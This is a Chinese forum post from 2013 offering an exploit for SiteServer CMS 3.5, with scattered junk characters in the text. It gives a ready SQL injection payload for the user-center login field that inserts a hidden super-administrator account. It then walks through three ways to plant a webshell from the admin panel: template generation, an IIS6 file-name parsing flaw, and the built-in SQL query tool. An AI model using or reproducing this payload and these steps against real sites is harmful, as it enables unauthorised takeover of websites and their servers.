经测试秒杀最新的3.5版2 s% p# Y; v* `) Q {, O% [7 e# U
stieserver官网:www.siteserver.cn
3 C1 s. c# X Z$ nEXP:
5 M+ H, ?% L6 `" p! s+ H6 z直接访问UserCenter/login.aspx4 q5 S2 j# r* d' o0 n" ~
用户名处输入:0 a: e& l6 v* t; ]5 Z$ h
# ~. I* H2 |% S123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–6 u- u$ p1 t* u8 r/ ]* h* O9 d. D {
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
2 |7 X# P' P- l5 N1 i之后再访问后台SiteServer/login.aspx用插入的用户登陆9 D+ t- x. z8 Y* B! V
后台拿webshell的三种方法:! R9 i- B" h& B
一、
, o# [9 ]1 S; M) V9 J% L$ |* |* G站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx& D3 o- ]( m7 {; {
二、1 g, H7 L1 V7 m! y. c: B) I4 j1 W/ q
成员权限-》添加用户-》用户名为:1.asp
3 J: H+ S. t; ], qhttp://127.0.0.1/usercenter/
9 m7 l1 S2 `8 n# e用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
6 d" o; e1 b3 u0 g(ps:后台添加用户时不会验证是否含有非法字符)4 F+ b. o: t+ C& |
三、
: x- G+ Q4 w7 ~系统工具-》实用工具-》机器参数查看+ \4 |5 s1 D0 V1 S/ ~7 P: E8 ^' p
可以看到数据库类型、名称,WEB路径
. b7 _* C8 `" F0 D系统工具-》数据库工具-》SQL语句查询% v" _$ S4 Z* p3 E% {
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对